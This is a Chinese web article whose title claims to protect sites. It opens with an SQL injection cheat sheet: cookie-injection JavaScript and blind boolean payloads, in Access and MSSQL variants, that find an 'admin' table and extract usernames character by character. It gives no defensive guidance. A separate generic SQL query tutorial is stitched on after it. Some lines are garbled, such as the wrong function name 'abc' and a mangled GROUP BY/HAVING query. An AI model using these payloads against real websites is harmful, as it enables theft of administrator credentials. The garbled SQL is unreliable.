理解這些SQL注入技術(shù) 讓你的網(wǎng)站不被攻擊

 Cookies注入代碼：
javascript:alert(document.cookie ="參數(shù)= "+escape("參數(shù)值 攻擊代碼"))
如: javascript:alert(document.cookie ="參數(shù)= "+escape("參數(shù)值 and 1=1"))

檢測(cè)可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常頁(yè)面)
http://127.0.0.1/xx?id=11 and 1=2 (出錯(cuò)頁(yè)面)

檢測(cè)表段的

http://127.0.0.1/xx?id=11 and exists (select * from admin)

檢測(cè)字段的

http://127.0.0.1/xx?id=11 and exists (select username from admin)

檢測(cè)ID

http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)

檢測(cè)長(zhǎng)度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)


檢測(cè)長(zhǎng)度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

檢測(cè)是否為MSSQL數(shù)據(jù)庫(kù)

http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)

檢測(cè)是否為英文

(ACCESS數(shù)據(jù)庫(kù))
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL數(shù)據(jù)庫(kù))
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)

檢測(cè)英文的范圍

(ACCESS數(shù)據(jù)庫(kù))
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL數(shù)據(jù)庫(kù))
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

檢測(cè)那個(gè)字符

(ACCESS數(shù)據(jù)庫(kù))
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)

(MSSQL數(shù)據(jù)庫(kù))
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)

常用函數(shù)

Access：asc(字符)　SQLServer：unicode(字符)
作用：返回某字符的ASCII碼

Access：chr(數(shù)字)　SQLServer：nchar(數(shù)字)
作用：與asc相反，根據(jù)ASCII碼返回字符

Access：mid(字符串,N,L)　SQLServer：substring(字符串,N,L)
作用：返回字符串從N個(gè)字符起長(zhǎng)度為L(zhǎng)的子字符串，即N到N+L之間的字符串

Access：abc(數(shù)字)　SQLServer：abc (數(shù)字)
作用：返回?cái)?shù)字的絕對(duì)值（在猜解漢字的時(shí)候會(huì)用到）

Access：A between B And C　SQLServer：A between B And C
作用：判斷A是否界于B與C之間

and exists(Select top 1 * From 用戶 order by id)


1.在查詢結(jié)果中顯示列名：
a.用as關(guān)鍵字：select name as '姓名' from students order by age
b.直接表示：select name '姓名' from students order by age

2.精確查找:
a.用in限定范圍：select * from students where native in ('湖南', '四川')
b.between...and：select * from students where age between 20 and 30
c.“=”：select * from students where name = '李山'
d.like:select * from students where name like '李%' (注意查詢條件中有“%”，則說(shuō)明是部分匹配，而且還有先后信息在里面，即查找以“李”開(kāi)頭的匹配項(xiàng)。所以若查詢有“李”的所有對(duì)象，應(yīng)該命令：'%李%';若是第二個(gè)字為李，則應(yīng)為'_李%'或'_李'或'_李_'。)
e.[]匹配檢查符：select * from courses where cno like '[AC]%' (表示或的關(guān)系，與"in(...)"類似，而且"[]"可以表示范圍，如：select * from courses where cno like '[A-C]%')


3.對(duì)于時(shí)間類型變量的處理
a.smalldatetime：直接按照字符串處理的方式進(jìn)行處理，例如：select * from students where birth > = '1980-1-1' and birth <= '1980-12-31'


4.集函數(shù)
a.count()求和，如：select count(*) from students (求學(xué)生總?cè)藬?shù))
b.avg(列)求平均，如：select avg(mark) from grades where cno=’B2’
c.max(列)和min(列)，求最大與最小

5.分組group
常用于統(tǒng)計(jì)時(shí)，如分組查總數(shù)：select gender,count(sno) from students group by gender(查看男女學(xué)生各有多少)
注意：從哪種角度分組就從哪列"group by"
對(duì)于多重分組，只需將分組規(guī)則羅列。比如查詢各屆各專業(yè)的男女同學(xué)人數(shù) ，那么分組規(guī)則有：屆別(grade)、專業(yè)(mno)和
性別(gender)，所以有"group by grade, mno, gender"
select grade, mno, gender, count(*) from students group by grade, mno, gender
通常group還和having聯(lián)用，比如查詢1門課以上不及格的學(xué)生，則按學(xué)號(hào)(sno)分類有：
select sno,count(*) from grades where mark<60 group="" by="" sno="" having="" count="">1


6.UNION聯(lián)合
合并查詢結(jié)果，如：
SELECT * FROM students WHERE name like ‘張%’UNION [ALL] SELECT * FROM students WHERE name like ‘李%’


7.多表查詢
a.內(nèi)連接
select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno
(注意可以引用別名)
b.外連接
b1.左連接
select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno
左連接特點(diǎn)：顯示全部左邊表中的所有項(xiàng)目，即使其中有些項(xiàng)中的數(shù)據(jù)未填寫(xiě)完全。

左外連接返回那些存在于左表而右表中卻沒(méi)有的行，再加上內(nèi)連接的行。
b2.右連接
與左連接類似
b3.全連接
select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno
兩邊表中的內(nèi)容全部顯示
c.自身連接
select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno
采用別名解決問(wèn)題。
d.交*連接
select lastname+firstname from lastname CROSS JOIN firstanme
相當(dāng)于做笛卡兒積


8.嵌套查詢
a.用關(guān)鍵字IN,如查詢豬豬山的同鄉(xiāng)：
select * from students where native in (select native from students where name=’豬豬’)
b.使用關(guān)鍵字EXIST,比如，下面兩句是等價(jià)的：
select * from students where sno in (select sno from grades where cno=’B2’)

select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)


9.關(guān)于排序order
a.對(duì)于排序order，有兩種方法：asc升序和desc降序
b.對(duì)于排序order,可以按照查詢條件中的某項(xiàng)排列，而且這項(xiàng)可用數(shù)字表示，如：
select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3

10.其他
a.對(duì)于有空格的識(shí)別名稱，應(yīng)該用"[]"括住。
b.對(duì)于某列中沒(méi)有數(shù)據(jù)的特定查詢可以用null判斷，如select sno,courseno from grades where mark IS NULL
c.注意區(qū)分在嵌套查詢中使用的any與all的區(qū)別，any相當(dāng)于邏輯運(yùn)算“||”而all則相當(dāng)于邏輯運(yùn)算“&&”
d.注意在做否定意義的查詢是小心進(jìn)入陷阱：
如，沒(méi)有選修‘B2’課程的學(xué)生 ：
select students.* from students, grades where students.sno=grades.sno AND grades.cno <> ’B2’
上面的查詢方式是錯(cuò)誤的，正確方式見(jiàn)下方：
select * from students where not exists (select * from grades where grades.sno=students.sno AND cno='B2')

11.關(guān)于有難度多重嵌套查詢的解決思想：如，選修了全部課程的學(xué)生：
select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))
最外一重：從學(xué)生表中選，排除那些有課沒(méi)選的。用not exist。由于討論對(duì)象是課程，所以第二重查詢從course表中找，排除那些選了課的即可。